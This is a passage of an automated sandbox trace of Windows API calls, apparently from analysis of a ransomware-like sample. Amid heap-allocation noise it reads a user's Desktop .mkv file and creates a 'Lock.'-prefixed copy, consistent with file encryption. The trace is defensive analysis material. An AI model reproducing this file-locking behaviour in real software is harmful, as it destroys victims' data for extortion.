lpMem=0x34a00e0 | out: hHeap=0x25c0000) returned 1 [0189.693] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0189.693] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0189.693] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0080 | out: hHeap=0x25c0000) returned 1 [0189.693] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0189.693] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0189.693] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0189.693] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0189.693] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0189.693] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0189.693] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0189.693] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0189.693] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0189.693] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0189.693] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0189.693] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0189.693] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0189.693] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0189.694] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0189.694] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0189.694] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0189.694] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0189.694] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0189.694] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0189.694] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0189.694] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0189.694] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0189.694] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0189.694] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0189.694] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0120 | out: hHeap=0x25c0000) returned 1 [0189.694] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f1a0 | out: hHeap=0x25c0000) returned 1 [0189.694] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0189.694] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0189.694] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0189.694] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0189.694] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0189.694] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0189.694] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416490 | out: hHeap=0x25c0000) returned 1 [0189.694] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416490 [0189.695] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416270 | out: hHeap=0x25c0000) returned 1 [0189.695] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0189.695] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0130 [0189.695] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0120 [0189.695] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00f0 [0189.695] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0189.695] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0080 [0189.695] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0189.695] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa628 [0189.695] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00e0 [0189.695] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa718 [0189.695] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00e0 | out: hHeap=0x25c0000) returned 1 [0189.695] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0189.695] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0189.695] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0189.695] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0080 | out: hHeap=0x25c0000) returned 1 [0189.695] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0189.695] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0189.695] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0120 | out: hHeap=0x25c0000) returned 1 [0189.695] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0189.696] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0189.696] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0189.696] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0189.696] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0189.696] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0130 [0189.696] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0189.696] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa628 [0189.696] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0120 [0189.696] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa718 [0189.696] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0120 | out: hHeap=0x25c0000) returned 1 [0189.696] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0189.696] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0189.696] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0189.696] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0189.696] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0189.696] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0189.696] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0189.696] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0189.696] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0189.696] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0189.696] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0189.697] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0189.697] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0189.697] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0189.697] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0189.697] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0189.697] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0189.697] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0189.697] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0189.697] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0189.697] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0189.697] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a18 | out: hHeap=0x25c0000) returned 1 [0189.697] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0189.697] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0189.697] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a18 [0189.697] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a18 | out: hHeap=0x25c0000) returned 1 [0189.697] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0189.697] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0189.697] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a18 [0189.697] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0130 [0189.697] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0189.697] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0189.698] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0189.698] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0120 [0189.698] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0189.698] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0120 | out: hHeap=0x25c0000) returned 1 [0189.698] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0189.698] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0189.698] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0189.698] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0189.698] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0130 [0189.698] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0120 [0189.698] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0189.698] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0189.698] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00f0 [0189.698] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa658 [0189.698] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0189.698] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0189.791] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0189.791] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0130 [0189.791] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0120 [0189.791] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0189.791] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0189.791] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00f0 [0189.791] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa658 [0189.791] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0189.791] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0189.791] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0130 [0189.791] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0120 [0189.792] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5c8 [0189.792] CryptDestroyHash (hHash=0xaa58e0) returned 1 [0189.792] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0189.792] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00f0 [0189.792] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0130 [0189.792] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0189.792] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0189.792] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0189.792] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0080 [0189.792] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0189.792] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0130 [0189.792] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0189.792] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0189.792] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00f0 [0189.793] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0189.793] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0189.793] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0189.793] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0189.793] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0189.793] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0189.793] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0189.793] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0189.793] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0189.793] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0189.793] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop/UCS72GVnNBUxEzx.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ucs72gvnnbuxezx.mkv"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x268 [0189.793] SetFilePointerEx (in: hFile=0x268, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0189.793] SetFilePointerEx (in: hFile=0x268, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8bf2c8 | out: lpNewFilePointer=0x0) returned 1 [0189.793] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466df0 [0189.793] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0189.793] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0189.794] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0189.794] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0189.794] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0189.794] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0189.794] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0189.794] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0189.794] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0189.794] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0189.794] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0189.794] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0189.794] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0189.794] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0189.794] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0189.794] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0189.794] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0189.794] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0189.794] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0189.794] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0189.794] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0189.794] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0189.794] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0189.794] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0189.795] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0189.795] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0189.795] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0189.795] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0189.795] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0189.795] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0189.795] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0189.795] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0189.795] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0189.795] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1198 [0189.795] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xa0) returned 0x24207f0 [0189.795] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0189.795] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop/" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0189.795] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0189.795] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0189.795] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0189.795] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10000) returned 0x24c7a50 [0189.795] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0189.795] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1198 [0189.795] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop/Lock.UCS72GVnNBUxEzx.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\lock.ucs72gvnnbuxezx.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0189.796] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466db0 [0189.796] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0189.796] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0189.796] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0189.796] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0189.796] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0189.796] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0189.796] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0189.796] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0189.796] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0189.796] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0189.796] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0189.797] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0189.797] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0189.797] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0189.797] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0189.797] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0189.797] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0189.797] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0189.797] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0189.797] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 